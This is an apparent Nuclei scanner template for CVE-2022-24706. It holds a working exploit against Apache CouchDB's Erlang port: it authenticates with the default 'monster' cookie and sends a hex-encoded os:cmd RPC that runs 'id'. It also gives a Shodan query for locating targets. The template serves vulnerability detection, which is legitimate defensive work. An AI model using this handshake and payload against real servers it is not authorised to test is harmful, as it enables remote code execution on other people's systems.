62 lines
2.3 KiB
YAML
62 lines
2.3 KiB
YAML
id: CVE-2022-24706
|
|
|
|
info:
|
|
name: CouchDB Erlang Distribution - Remote Command Execution
|
|
author: Mzack9999,pussycat0x
|
|
severity: critical
|
|
description: |
|
|
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50914
|
|
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
|
|
- http://www.openwall.com/lists/oss-security/2022/04/26/1
|
|
- http://www.openwall.com/lists/oss-security/2022/05/09/1
|
|
remediation: |
|
|
Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-24706
|
|
cwe-id: CWE-1188
|
|
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
|
|
epss-score: 0.97407
|
|
metadata:
|
|
max-request: 1
|
|
product: couchdb
|
|
shodan-query: product:"CouchDB"
|
|
vendor: apache
|
|
verified: "true"
|
|
tags: cve,cve2022,network,couch,rce,kev
|
|
variables:
|
|
name_msg: "00156e00050007499c4141414141414041414141414141"
|
|
challenge_reply: "00157201020304"
|
|
cookie: "monster"
|
|
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
|
|
tcp:
|
|
- host:
|
|
- "{{Hostname}}"
|
|
port: 9100
|
|
|
|
inputs:
|
|
# auth
|
|
- data: "{{name_msg}}"
|
|
type: hex
|
|
read: 1024
|
|
- read: 1024
|
|
name: challenge
|
|
- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
|
|
type: hex
|
|
# rce
|
|
- data: "{{cmd}}"
|
|
type: hex
|
|
read: 1024
|
|
matchers:
|
|
- type: word
|
|
part: raw
|
|
words:
|
|
- "uid"
|
|
- "gid"
|
|
- "groups"
|
|
condition: and
|
|
# digest: 4b0a0048304602210093ffb4f5bccf651fa25d037a91e1f0a081fce4f81404fa0d714c336a0cc640ea022100f06fe4191cb5cc0c7d8e71028302e622776af1f07dc61a6450aa8f711752049d:922c64590222798bb761d5b6d8e72950 |